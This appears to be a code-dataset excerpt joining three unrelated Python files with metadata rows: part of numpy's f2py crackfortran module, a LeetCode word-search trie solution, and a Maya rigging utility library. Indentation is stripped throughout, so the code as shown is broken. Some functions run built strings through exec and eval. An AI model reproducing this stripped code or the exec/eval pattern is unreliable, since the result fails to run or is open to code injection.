ret = '%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s' % (
tab, prefix, blocktype, name, args, result, mess, f2pyenhancements, use, vars, common, body, tab, blocktype, name)
return ret
def common2fortran(common, tab=''):
ret = ''
for k in list(common.keys()):
if k == '_BLNK_':
ret = '%s%scommon %s' % (ret, tab, ','.join(common[k]))
else:
ret = '%s%scommon /%s/ %s' % (ret, tab, k, ','.join(common[k]))
return ret
def use2fortran(use, tab=''):
ret = ''
for m in list(use.keys()):
ret = '%s%suse %s,' % (ret, tab, m)
if use[m] == {}:
if ret and ret[-1] == ',':
ret = ret[:-1]
continue
if 'only' in use[m] and use[m]['only']:
ret = '%s only:' % (ret)
if 'map' in use[m] and use[m]['map']:
c = ' '
for k in list(use[m]['map'].keys()):
if k == use[m]['map'][k]:
ret = '%s%s%s' % (ret, c, k)
c = ','
else:
ret = '%s%s%s=>%s' % (ret, c, k, use[m]['map'][k])
c = ','
if ret and ret[-1] == ',':
ret = ret[:-1]
return ret
def true_intent_list(var):
lst = var['intent']
ret = []
for intent in lst:
try:
f = globals()['isintent_%s' % intent]
except KeyError:
pass
else:
if f(var):
ret.append(intent)
return ret
def vars2fortran(block, vars, args, tab='', as_interface=False):
"""
TODO:
public sub
...
"""
setmesstext(block)
ret = ''
nout = []
for a in args:
if a in block['vars']:
nout.append(a)
if 'commonvars' in block:
for a in block['commonvars']:
if a in vars:
if a not in nout:
nout.append(a)
else:
errmess(
'vars2fortran: Confused?!: "%s" is not defined in vars.\n' % a)
if 'varnames' in block:
nout.extend(block['varnames'])
if not as_interface:
for a in list(vars.keys()):
if a not in nout:
nout.append(a)
for a in nout:
if 'depend' in vars[a]:
for d in vars[a]['depend']:
if d in vars and 'depend' in vars[d] and a in vars[d]['depend']:
errmess(
'vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n' % (a, d))
if 'externals' in block and a in block['externals']:
if isintent_callback(vars[a]):
ret = '%s%sintent(callback) %s' % (ret, tab, a)
ret = '%s%sexternal %s' % (ret, tab, a)
if isoptional(vars[a]):
ret = '%s%soptional %s' % (ret, tab, a)
if a in vars and 'typespec' not in vars[a]:
continue
cont = 1
for b in block['body']:
if a == b['name'] and b['block'] == 'function':
cont = 0
break
if cont:
continue
if a not in vars:
show(vars)
outmess('vars2fortran: No definition for argument "%s".\n' % a)
continue
if a == block['name'] and not block['block'] == 'function':
continue
if 'typespec' not in vars[a]:
if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']:
if a in args:
ret = '%s%sexternal %s' % (ret, tab, a)
continue
show(vars[a])
outmess('vars2fortran: No typespec for argument "%s".\n' % a)
continue
vardef = vars[a]['typespec']
if vardef == 'type' and 'typename' in vars[a]:
vardef = '%s(%s)' % (vardef, vars[a]['typename'])
selector = {}
if 'kindselector' in vars[a]:
selector = vars[a]['kindselector']
elif 'charselector' in vars[a]:
selector = vars[a]['charselector']
if '*' in selector:
if selector['*'] in ['*', ':']:
vardef = '%s*(%s)' % (vardef, selector['*'])
else:
vardef = '%s*%s' % (vardef, selector['*'])
else:
if 'len' in selector:
vardef = '%s(len=%s' % (vardef, selector['len'])
if 'kind' in selector:
vardef = '%s,kind=%s)' % (vardef, selector['kind'])
else:
vardef = '%s)' % (vardef)
elif 'kind' in selector:
vardef = '%s(kind=%s)' % (vardef, selector['kind'])
c = ' '
if 'attrspec' in vars[a]:
attr = [l for l in vars[a]['attrspec']
if l not in ['external']]
if attr:
vardef = '%s, %s' % (vardef, ','.join(attr))
c = ','
if 'dimension' in vars[a]:
vardef = '%s%sdimension(%s)' % (
vardef, c, ','.join(vars[a]['dimension']))
c = ','
if 'intent' in vars[a]:
lst = true_intent_list(vars[a])
if lst:
vardef = '%s%sintent(%s)' % (vardef, c, ','.join(lst))
c = ','
if 'check' in vars[a]:
vardef = '%s%scheck(%s)' % (vardef, c, ','.join(vars[a]['check']))
c = ','
if 'depend' in vars[a]:
vardef = '%s%sdepend(%s)' % (
vardef, c, ','.join(vars[a]['depend']))
c = ','
if '=' in vars[a]:
v = vars[a]['=']
if vars[a]['typespec'] in ['complex', 'double complex']:
try:
v = eval(v)
v = '(%s,%s)' % (v.real, v.imag)
except Exception:
pass
vardef = '%s :: %s=%s' % (vardef, a, v)
else:
vardef = '%s :: %s' % (vardef, a)
ret = '%s%s%s' % (ret, tab, vardef)
return ret
######
def crackfortran(files):
global usermodules
outmess('Reading fortran codes...\n', 0)
readfortrancode(files, crackline)
outmess('Post-processing...\n', 0)
usermodules = []
postlist = postcrack(grouplist[0])
outmess('Post-processing (stage 2)...\n', 0)
postlist = postcrack2(postlist)
return usermodules + postlist
def crack2fortran(block):
global f2py_version
pyf = crack2fortrangen(block) + '\n'
header = """! -*- f90 -*-
! Note: the context of this file is case sensitive.
"""
footer = """
! This file was auto-generated with f2py (version:%s).
! See http://cens.ioc.ee/projects/f2py2e/
""" % (f2py_version)
return header + pyf + footer
if __name__ == "__main__":
files = []
funcs = []
f = 1
f2 = 0
f3 = 0
showblocklist = 0
for l in sys.argv[1:]:
if l == '':
pass
elif l[0] == ':':
f = 0
elif l == '-quiet':
quiet = 1
verbose = 0
elif l == '-verbose':
verbose = 2
quiet = 0
elif l == '-fix':
if strictf77:
outmess(
'Use option -f90 before -fix if Fortran 90 code is in fix form.\n', 0)
skipemptyends = 1
sourcecodeform = 'fix'
elif l == '-skipemptyends':
skipemptyends = 1
elif l == '--ignore-contains':
ignorecontains = 1
elif l == '-f77':
strictf77 = 1
sourcecodeform = 'fix'
elif l == '-f90':
strictf77 = 0
sourcecodeform = 'free'
skipemptyends = 1
elif l == '-h':
f2 = 1
elif l == '-show':
showblocklist = 1
elif l == '-m':
f3 = 1
elif l[0] == '-':
errmess('Unknown option %s\n' % repr(l))
elif f2:
f2 = 0
pyffilename = l
elif f3:
f3 = 0
f77modulename = l
elif f:
try:
open(l).close()
files.append(l)
except IOError as detail:
errmess('IOError: %s\n' % str(detail))
else:
funcs.append(l)
if not strictf77 and f77modulename and not skipemptyends:
outmess("""\
    Warning: You have specified a module name for non-Fortran-77 code
    that should not need one (except if you are scanning F90 code
    for non-module blocks; but then you should use the flag -skipemptyends
    and also be sure that the files do not contain programs without a program statement).
""", 0)
postlist = crackfortran(files)
if pyffilename:
outmess('Writing fortran code to file %s\n' % repr(pyffilename), 0)
pyf = crack2fortran(postlist)
with open(pyffilename, 'w') as f:
f.write(pyf)
if showblocklist:
show(postlist)
| bsd-3-clause | 7,846,563,131,492,437,000 | 37.362383 | 207 | 0.469806 | false |
guozengxin/myleetcode | python/wordSearchII.py | 1 | 2827 | # https://leetcode.com/problems/word-search-ii/
class Solution(object):
def findWords(self, board, words):
"""
:type board: List[List[str]]
:type words: List[str]
:rtype: List[str]
"""
trie = Trie()
for w in words:
trie.insert(w)
res = set()
for i in xrange(len(board)):
for j in xrange(len(board[i])):
visited = set()
self.dfs(board, trie.root, i, j, visited, res)
return list(res)
def dfs(self, board, trieNode, i, j, visited, res):
if (i, j) in visited:
return
if (i < 0 or j < 0 or i >= len(board) or j >= len(board[i])):
return
cur = board[i][j]
if cur in trieNode.nodes:
if trieNode.nodes[cur].isLeaf:
res.add(trieNode.nodes[cur].word)
visited.add((i, j))
self.dfs(board, trieNode.nodes[cur], i+1, j, visited, res)
self.dfs(board, trieNode.nodes[cur], i, j+1, visited, res)
self.dfs(board, trieNode.nodes[cur], i-1, j, visited, res)
self.dfs(board, trieNode.nodes[cur], i, j-1, visited, res)
visited.remove((i, j))
class TrieNode(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.nodes = {}
self.word = ''
self.isLeaf = False
class Trie(object):
def __init__(self):
self.root = TrieNode()
def insert(self, word):
"""
Inserts a word into the trie.
:type word: str
:rtype: void
"""
node = self.root
for c in word:
if c in node.nodes:
node = node.nodes[c]
else:
newNode = TrieNode()
node.nodes[c] = newNode
node = newNode
node.isLeaf = True
node.word = word
def search(self, word):
"""
Returns if the word is in the trie.
:type word: str
:rtype: bool
"""
node = self.root
for c in word:
if c in node.nodes:
node = node.nodes[c]
else:
return False
return node.isLeaf
def startsWith(self, prefix):
"""
Returns if there is any word in the trie
that starts with the given prefix.
:type prefix: str
:rtype: bool
"""
node = self.root
for c in prefix:
if c in node.nodes:
node = node.nodes[c]
else:
return False
return True
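# Hedged usage sketch (added; not part of the original solution) showing the
# Trie behaviour that lets the board DFS prune dead branches:
#   t = Trie()
#   t.insert('oath')
#   t.search('oath')      # True  (complete word)
#   t.search('oat')       # False (prefix only)
#   t.startsWith('oat')   # True  (so the DFS keeps walking)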
board = [
['o','a','a','n'],
['e','t','a','e'],
['i','h','k','r'],
['i','f','l','v']
]
words = ["oath","pea","eat","rain"]
s = Solution()
print s.findWords(board, words) | mit | 7,831,944,678,315,443,000 | 24.25 | 70 | 0.474708 | false |
Leopardob/Kistie | kcode/kcore/KstMaya.py | 1 | 28693 | '''
K.I.S.T.I.E (Keep, It, Simple, Take, It, Easy)
Created on 1 Jan 2013
@author: Leonardo Bruni, [email protected]
Kistie Maya Module Library
This Kistie implementation i's part of project 'Kistie_Autorig' by Leonardo Bruni, [email protected]
'''
#ToDo: implement a debug mode for print or not
import pymel as pm # import pymel lib
import maya.cmds as cmds # import maya cmds lib
import maya.mel as mel # import maya mel lib
import maya.OpenMaya as om
# Import kstCore
import kcode.kcore.KstCore as _KstCore_
reload(_KstCore_)
KstCore = _KstCore_.KstCore()
# Import kstMath
import kcode.kmath.KstMath as _KstMath_
reload(_KstMath_)
KstMath = _KstMath_.KstMath()
# Import KstOut
import kcode.kcore.KstOut as _KstOut_
reload(_KstOut_)
KstOut = _KstOut_.KstOut()
class KstMaya(object):
# Debug module name variable
_debug = 'KstMaya'
def __init__(self):
KstOut.debug('Kistie Maya function module loaded... ')
# Channels Operation method
def channels_op(self, selections, channels_list, *args):
'''
Desc:
Make operation on channels
Parameter:
selections = list of selection where perform operations
*args = type of operation (lock, hide)
channels_list = list of channels to perform operations
Return void
Example:
KstMaya.channels_op(['selection'], ['ch','ch','ch'], 'lock=Bool', 'keyable=Bool', 'channelBox=Bool')
'''
# Declare variable for errors
errors_list = []
# Check if selections type input is valid
if not type(selections) is list:
KstOut.debug(KstMaya._debug, 'selections must be a list!')
errors_list.append('selections')
# Check if channels_list input is valid
if not type(channels_list) is list:
KstOut.debug(KstMaya._debug, 'channels_list must be a list!')
errors_list.append('channels')
try:
# If there are no errors go
if len(errors_list) == 0:
# Create empty value for python command
cmd = ''
for sel in selections:
for ch in channels_list:
for count, arg in enumerate(args):
# Build string command
cmd = "cmds.setAttr('%s.%s', %s)" % (sel, ch, arg)
# Execute string command // ToDo, build a Kistie class for this
exec(cmd)
# Debug command
KstOut.debug(KstMaya._debug, cmd)
# Otherwise stop and release errorsList
else:
KstOut.debug(KstMaya._debug, 'You have some errors: ', errors_list)
except:
KstOut.error(KstMaya._debug, 'Error found!!! '+str(errors_list))
@staticmethod
# Get Shape method
def get_shape_node(transform):
'''
Desc:
return a shape from a transform
Parameter:
transform = transform node that you want get the shape
Return:
Shape obj from the transform
'''
shape_list = cmds.listRelatives(transform, s=True)
if shape_list:
shape = shape_list[0]
return shape
else:
#KstOut.debug(self._debug_msg, 'No shapes found in current transform, double check')
return None
# Get Transform method
def get_transform_node(self, shape):
'''
Desc:
return a transform from a shape
Parameter:
shape = shape node that you want get the transform
Return:
Transform obj from the shape
'''
try:
transform_list = cmds.listRelatives(shape, p=True)
if transform_list:
transform = transform_list[0]
return transform
except:
KstOut.debug(KstMaya._debug, 'No transform found in current shape, double check')
pass
# Get Parent method
@staticmethod
def get_his_parent(obj):
'''
Desc:
return parent from an object
Parameter:
obj = object to get the parent
Return:
Parent object
'''
try:
parent = cmds.listRelatives(obj, p=True)
if parent:
return parent
except:
KstOut.debug(KstMaya._debug, 'No parent object found, double check')
pass
# Get Parent method
@staticmethod
def get_his_child(obj):
'''
Desc:
return child from an object
Parameter:
obj = object to get the child
Return:
Parent object
'''
try:
child = cmds.listRelatives(obj, c=True)
if child:
return child
except:
KstOut.debug(KstMaya._debug, 'No child object found, double check')
pass
# Get all input type (nodeType) nodes in scene
def get_node_type(self, node_type):
'''
Desc:
return a list of node founded from nodeType parameter
Parameter:
node_type = nodes type to find
Return:
a list with node of that type defined in input
'''
node_list = cmds.ls(type=node_type)
found_nodes = []
if node_list:
KstOut.debug(KstMaya._debug, str(node_type)+' nodes list: ')
for node in node_list:
KstOut.debug(KstMaya._debug, 'nodetype = '+str(node_type)+'-> '+str(node))
found_nodes.append(node)
else:
KstOut.debug(KstMaya._debug, 'nodetype "'+str(node_type)+'" not exists!')
return found_nodes
# Get all input name (nodeName) nodes in scene
def get_node_if_name_contains(self, node_name):
'''
Desc:
return a list of node founded from nodeName parameter
Parameter:
node_name = nodes name to find
Return:
a list with node of that contains name defined in input
'''
node_list = cmds.ls()
found_nodes = []
if node_list:
for node in node_list:
if node_name in node:
KstOut.debug(KstMaya._debug, '-> '+str(node))
found_nodes.append(node)
else:
KstOut.debug(KstMaya._debug, str(node_name)+' not exists')
return found_nodes
# Make a copy of the inputObject
def duplicate_this(self, input_object, copy_name='cpy_'):
'''
Desc:
            return an obj that is the copy of input_object, renamed with the copy_name prefix
Parameter:
input_object = the object to be copied
copy_name = the copy name
Return:
the obj copied from the original with the new name
'''
if input_object:
#cmds.select(input_object)
copy_object = cmds.duplicate(input_object, smartTransform=True, name = copy_name, renameChildren = True)
copy_object[0] = cmds.rename(copy_object[0], copy_name+input_object)
#print('DEBUG copy object: ', copy_object)
# Search all children of the current object for renaming
hierarchy = cmds.listRelatives(copy_object, c=True)
if hierarchy:
for child in hierarchy:
cmds.rename(child, copy_name+child[:-1])
KstOut.debug(KstMaya._debug, str(copy_object[0])+" duplicated from "+str(input_object))
return copy_object
else:
KstOut.debug(KstMaya._debug, ' inputObject empty, check selection, or array')
# Make connection between two node with specified attributes ToDo: add code for test if connection is already in there or not, if it is force delete
def node_op(self, src, op, dst):
'''
Desc:
Make node operation between two object+attributes
Parameter:
src = source object and attr
op = operator:
this value can be
>> connect SRC to DST
<< connect DST to SRC
                || disconnect SRC from DST
            dst = destination object and attr
Return:
bool attribute, True if connection was done, otherwise in all others case False
'''
stat = False
if src and dst and op:
if op == '>>':
try:
cmds.connectAttr(src, dst, f=True)
stat = True
except:
KstOut.debug(KstMaya._debug, 'Error occurred making connection src, dst')
KstOut.debug(KstMaya._debug, 'DEBUG DATA: ')
KstOut.debug(KstMaya._debug, '%s = SOURCE' % src)
KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst)
KstOut.debug(KstMaya._debug, '-> END DATA')
print 'CANNOT ', src, dst
elif op == '<<':
try:
cmds.connectAttr(dst, src, f=True)
stat = True
except:
KstOut.debug(KstMaya._debug, 'Error occurred making connection dst, src')
KstOut.debug(KstMaya._debug,'DEBUG DATA: ')
KstOut.debug(KstMaya._debug, '%s = SOURCE' % src)
KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst)
KstOut.debug(KstMaya._debug, '-> END DATA')
# print ''
elif op == '||':
try:
cmds.disconnectAttr(src, dst, f=True)
stat = True
except:
KstOut.debug(KstMaya._debug, 'Error occurred in disconnection')
KstOut.debug(KstMaya._debug, 'DEBUG DATA: ')
KstOut.debug(KstMaya._debug, '%s = SOURCE' % src)
KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst)
KstOut.debug(KstMaya._debug, '-> END DATA')
# print ''
else:
KstOut.debug(KstMaya._debug, ' symbol not defined, you can use (>>, <<, ||)')
stat = False
return stat
else:
KstOut.debug(KstMaya._debug, ' double check inputs (source, operator, destination)')
KstOut.error(KstMaya._debug, ' double check inputs (source, operator, destination)')
return None
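    # Usage sketch (added for illustration; the plug names 'locA.tx' and
    # 'locB.tx' are assumptions, not objects this module creates):
    #   KstMaya().node_op('locA.tx', '>>', 'locB.tx')   # connect
    #   KstMaya().node_op('locA.tx', '||', 'locB.tx')   # disconnect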
# Destroy all connections, finally works with keyframes and normal connections
def destroy_channels_connections(self, sel, channels_list):
'''
Desc:
Destroy connections for selected channels
sel = current object
*args = list of channels to disconnect in format [ch,ch,ch,...]
'''
for ch in channels_list:
src_attr = cmds.connectionInfo(sel+'.'+ch, sourceFromDestination=True)
if src_attr:
KstOut.debug(KstMaya._debug, 'SOURCE: '+src_attr)
KstOut.debug(KstMaya._debug, 'DEST: '+sel+'.'+ch)
cmds.disconnectAttr(src_attr, sel+'.'+ch)
# Make constraint in more simple mode
def make_constraint(self, src, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weight=1, aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None):
'''
Desc:
            Make any constraint
        Parameter:
            src = source object to constraint from
            dst = destination object to constraint to
            constraint_type = constraint type ('parent', 'point', 'orient' or 'aim')
            maintain_offset = maintainOffset bool value
        Return:
            constraint node name
'''
# var for constraint name
constraint = []
type=''
# Fix name
name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '')
# Parent constraint
if constraint_type == 'parent':
type='PAC'
constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weight, st=skip_translate, name=name+'_'+type)
# Point constraint
elif constraint_type == 'point':
type='PC'
constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_translate, name=name+'_'+type)
# Orient constraint
elif constraint_type == 'orient':
type='OC'
constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, name=name+'_'+type)
# Aim constraint, ToDo, optimize
elif constraint_type == 'aim':
type='AC'
if world_up_type == 'object':
if world_up_object == None:
KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None")
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type)
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type)
#constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type))
# Delete constraint node if needed
if keep_constraint_node == False:
cmds.delete(constraint)
return constraint
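    # Usage sketch (added): a typical aim constraint call; the node names
    # ('src_LOC', 'dst_JNT', 'up_LOC') are assumptions for this example only:
    #   self.make_constraint('src_LOC', 'dst_JNT', constraint_type='aim',
    #                        aim_vec=[0, 1, 0], up_vec=[0, 0, 1],
    #                        world_up_type='object', world_up_object='up_LOC',
    #                        name='example')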
# Make multi constraint in more simple mode
def make_multi_constraint(self, src_list, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weights_list=[1.0], aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None):
'''
Desc:
            Make a multi constraint (several sources, one destination) for any constraint type
        Parameter:
            src_list = list of source objects to constraint from
            dst = destination object to constraint to
            constraint_type = constraint type ('parent', 'point', 'orient' or 'aim')
            weights_list = per-source weight values
        Return:
            constraint node name
'''
# var for constraint name
constraint = []
type=''
# Fix name
name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '')
# Loop each element in src_list
i = 0
for src in src_list:
# Parent constraint
if constraint_type == 'parent':
type='PAC'
constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weights_list[i], st=skip_translate, name=name+'_'+type)
i = i+1
# Point constraint
elif constraint_type == 'point':
type='PC'
constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_translate, name=name+'_'+type)
i = i+1
# Orient constraint
elif constraint_type == 'orient':
type='OC'
constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, name=name+'_'+type)
i = i+1
# Aim constraint, ToDo, optimize
elif constraint_type == 'aim':
type='AC'
if world_up_type == 'object':
if world_up_object == None:
KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None")
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type)
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type)
i = i+1
#constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type))
# Delete constraint node if needed
if keep_constraint_node == False:
cmds.delete(constraint)
return constraint
# Get position list from object position
def get_position_list_from_objs(self, object_list, coords_space='world'):
'''
Desc:
Get a position list from object list
Parameter:
object_list = the object list
            coords_space = the coordinate space, can be "world" (default), or "local"
Return:
list with positions
'''
position_list = []
# Check if position list is valid
if object_list:
# Set coords to world
if coords_space == 'world':
world_space = True
object_space = False
# Set coord to local
elif coords_space == 'local':
world_space = False
object_space = True
for obj in object_list:
KstOut.debug(KstMaya._debug, obj)
obj_pos = cmds.xform(obj, q=True, t=True, ws=world_space, os=object_space)
position_list.append(obj_pos)
return position_list
else:
KstOut.debug(KstMaya._debug, 'Check if inputs are valid')
return None
# Get cvs list
def get_num_cvs(self, curve):
'''
        Desc:
            Get the number of cvs of a curve (spans + degree)
        Parameter:
            curve = the curve to count the cvs of
        Return:
            the number of cvs as an int
'''
# If curve is nod define or not correct release error
if curve:
# Get curve shape
curve_shape = KstMaya.get_shape_node(curve)
# Get degree
degree = cmds.getAttr(curve_shape+".degree")
# Get spans
spans = cmds.getAttr(curve_shape+".spans")
# Calulating ncvs with formula spans+degree
ncvs = spans+degree
# Return the list
return ncvs
else:
cmds.warning("Curve %s, is not defined, or is not a curve, double check!" % curve)
return None
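    # Worked example (added): a NURBS curve exposes spans + degree CVs, so a
    # cubic (degree 3) curve with 5 spans has 8 CVs: curve.cv[0] .. curve.cv[7].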
@staticmethod
# Get position list from cvs position
def get_cvs_position_list_from_curve(curve, coords_space='world'):
'''
Desc:
Get cv position list from a curve
Parameter:
            curve = curve to get the cvs position list from
            coords_space = the coordinate space, can be "world" (default), or "local"
Return:
list with positions
'''
# If curve is nod define or not correct release error
if curve:
# Define a list with all positions
position_list = []
# Define ws var
ws = False
# Get curve shape
curve_shape = KstMaya.get_shape_node(curve)
# Get degree
degree = cmds.getAttr(curve_shape+".degree")
# Get spans
spans = cmds.getAttr(curve_shape+".spans")
# Calulating ncvs with formula spans+degree
ncvs = spans+degree
# Define and set ws var for xform
if coords_space=='world':
ws = True
# Iterate over curve cvs
for i in range(0, ncvs):
pos = cmds.xform(curve_shape+".cv[%s]" % i, q = True, t = True, ws = ws)
position_list.append(pos)
# Return the list
return position_list
else:
cmds.warning("Curve %s, is not defined, or is not a curve, double check!" % curve)
return None
def transfer_connections(self, src, dst, connections_list, mode = 'move'):
'''
Desc:
            Copy or move connections from one node to another
Parameter:
src = source object move (or copy) connections from
dst = destination object move (or copy) connections to
connections_list = connections list to move or copy
Return:
None
'''
# List connections for src
if len(connections_list):
for conn in connections_list:
src_connections = cmds.listConnections('%s.%s' % (src, conn), c = True, plugs = True)
                # Now src_connections[0] holds the original source plug and
                # src_connections[1] the original destination plug,
                # so just replace the source name
# Store the current connection
curr_conn = src_connections[0].split('.')[1]
# If mode is setted on move disconnect old object
if mode == 'move':
self.node_op(src_connections[0], '||', src_connections[1])
# Exchange src with specified destination
new_src = dst
# Reconnect
self.node_op('%s.%s' % (new_src, curr_conn), '>>', src_connections[1])
# Insert element in hierarchy
def insert_parent(self, src, dst, reset_src_trs = True):
'''
Desc:
Insert an object in the middle of an existing hierarchy
Parameter:
src = object to insert
dst = destination object that will be reparented
Return:
None
'''
# Check existing hierarchy
# Who's the parent
parent = KstMaya.get_his_parent(dst)
# Who's the child
child = KstMaya.get_his_child(dst)
# Remake hiararchy
cmds.parent(src, parent)
cmds.parent(child, src)
return parent, src, child
def mirror_this(self, obj_to_mirror, plane = 'YZ'): # ToDo: finish and check
'''
        Desc:
            Mirror an object's world translation across a world plane
        Parameter:
            obj_to_mirror = object whose translation is mirrored (an 'L'/'R'
                            naming convention is assumed for the mirrored target)
            plane = mirror plane, 'YZ' (default), 'XZ' or 'XY'
        Return:
            the mirrored coordinates as an om.MVector
'''
mirrored = obj_to_mirror.replace('L','R')
trs = cmds.xform(obj_to_mirror, q=True, t=True, ws=True)
trs_vec = om.MVector(float(trs[0]), float(trs[1]), float(trs[2]))
        if plane == 'YZ':
            mirror_axis = om.MVector(-1, 1, 1)
        elif plane == 'XZ':
            mirror_axis = om.MVector(1, -1, 1)
        elif plane == 'XY':
            mirror_axis = om.MVector(1, 1, -1)
        else:
            # Unknown plane: don't mirror at all
            mirror_axis = om.MVector(1, 1, 1)
mirrored_coords = om.MVector(trs_vec.x * mirror_axis.x, trs_vec.y * mirror_axis.y, trs_vec.z * mirror_axis.z)
cmds.setAttr('%s.%s' % (mirrored, 'tx'), mirrored_coords.x )
cmds.setAttr('%s.%s' % (mirrored, 'ty'), mirrored_coords.y )
cmds.setAttr('%s.%s' % (mirrored, 'tz'), mirrored_coords.z )
return mirrored_coords
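    # Worked example (added): mirroring across the YZ plane only negates X,
    # so (1, 2, 3) maps to (-1, 2, 3); 'XZ' negates Y and 'XY' negates Z.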
    # Collect the destination-mesh vertices that lie within a given distance of the source mesh
def get_closest_vertices_between(self, src, dst, dist): # ToDo: check code
'''
        Desc:
            Find the vertices of the destination mesh that lie within `dist`
            of any vertex of the source mesh, and add them to the selection
        Parameter:
            src = source mesh
            dst = destination mesh
            dist = distance threshold
        Return:
            None (found vertex indices are collected in closest_vlist)
'''
# Get the relative MObject for use method API for source and destination
oSrc = KstCore.get_mobject_from_name(src)
oDst = KstCore.get_mobject_from_name(dst)
# Get the relative DAG for use method API for source and destination
dSrc = KstCore.get_dag_from_node_name(src)
dDst = KstCore.get_dag_from_node_name(dst)
# Attach mesh functions to src and dst objects
srcFnMesh = om.MFnMesh(dSrc)
dstFnMesh = om.MFnMesh(dDst)
# Define the list for closestVertex storage
closest_vlist = list()
# Check if the datatype is mesh
if srcFnMesh.type() == om.MFn.kMesh and dstFnMesh.type() == om.MFn.kMesh:
srcItVert = om.MItMeshVertex(oSrc)
dstItVert = om.MItMeshVertex(oDst)
# Define variables for mesh iterator
srcVtxPos = om.MPoint()
dstVtxPos = om.MPoint()
ws = om.MSpace.kObject
            # Define an empty point array to store all positions from the iterator
            srcVtxsPos = om.MPointArray()
            # Define a point-on-mesh holder to store the closest-point result
closestPoints = om.MPointOnMesh()
# Define MMeshIntersector on destination mesh for get closest point
meshIntersector = om.MMeshIntersector()
# Define a DAGPath for retrieve selection based on component
selectionClosest = om.MSelectionList()
selection_dag = om.MDagPath()
# Iterate over all mesh vertices, and get all positions
while not srcItVert.isDone():
# Get current position
srcVtxPos = srcItVert.position(ws)
while not dstItVert.isDone():
srcVtxDest = dstItVert.position(ws)
mag = KstMath.get_mag(KstMath.vec_from_2_points(srcVtxPos, srcVtxDest))
if mag <= dist:
closest_vlist.append(dstItVert.index())
cmds.select(dst+'.vtx[%s]' % dstItVert.index(), add=True)
dstItVert.next()
srcItVert.next()
print('ARRAY CLOSEST: ', closest_vlist)
'''
clothRigGrp = "clothAnimRig_GRP"
jntPos = cmds.xform(jnt, q=True, ws=True, t=True)
sel = sel.replace("[u'","")
sel = sel.replace("']","")
scluster = str(sknMsh)
scluster = scluster.replace("[u'","")
scluster = scluster.replace("']","")
vtxs = cmds.polyEvaluate(sel, v=True)
ntotVtxs = vtxs/njoints
closestPoints = []
#print jntPos
#for i in xrange(vtxs):
for i in range(500):
vtx = (sel+".vtx["+str(i)+"]")
print " "
print vtx
if cmds.progressBar(progressControl, query = True, isCancelled = True):
break
#if i%2 == 1:
ppos = []
ppos = cmds.xform((sel+".vtx["+str(i)+"]"), q = True, ws = True, t = True)
newpos = [ppos[0] - jntPos[0], ppos[1] - jntPos[1], ppos[2] - jntPos[2]]
res = mag(newpos)
cmds.text(stat, edit=True, label = (str(i)+"/"+str(vtxs)))
skinJointsList = maya.mel.eval('skinPercent -query -transform %(scluster)s %(vtx)s' %vars())
# ToDo: skinCluster conversion\
trackers = []
weights = []
newjnt = []
cpStra = 'pointConstraint -mo '
cpStrb = ''
for obj in skinJointsList:
transform = obj
joints = (obj+".vtx["+str(i)+"]JNT")
skinValue = maya.mel.eval('skinPercent -transform %(transform)s -query -value %(scluster)s %(vtx)s' %vars())
#print ("DEBUG: "+str(transform)+" VALUE: "+str(skinValue))
if (res <= dist):
newjnt = cmds.joint(n = (obj+".vtx["+str(i)+"]JNT"),p = ppos)
cmds.setAttr((newjnt+'.radius'),.05)
cmds.parent(newjnt, clothRigGrp)
trackers.append(obj)
weights.append(skinValue)
if len(trackers) > 0:
print trackers
print weights
#print trackers
#print weights
#cmds.pointConstraint(trackers, newjnt, mo = True)
#cpStra+= ('%(trackers)s ')
#cpStrj= ('%(joints)s ')
#cpStrb+= ('%(weights)s ')
#print(cpStra+cpStrj)
#print trackers
#print weights
cmds.progressBar(progressControl, edit = True, step = 1)
'''
# Abc code
def abc_import(self, mode='Import', namespace='', file_path=''):
cmdStr = ''
# Import
if mode == 'Import':
cmds.file(file_path, i=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace)
# Reference
if mode == 'Reference':
cmds.file(file_path, r=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace)
def foo(self):
pass | bsd-3-clause | -8,954,775,622,513,176,000 | 34.689055 | 303 | 0.545569 | false |
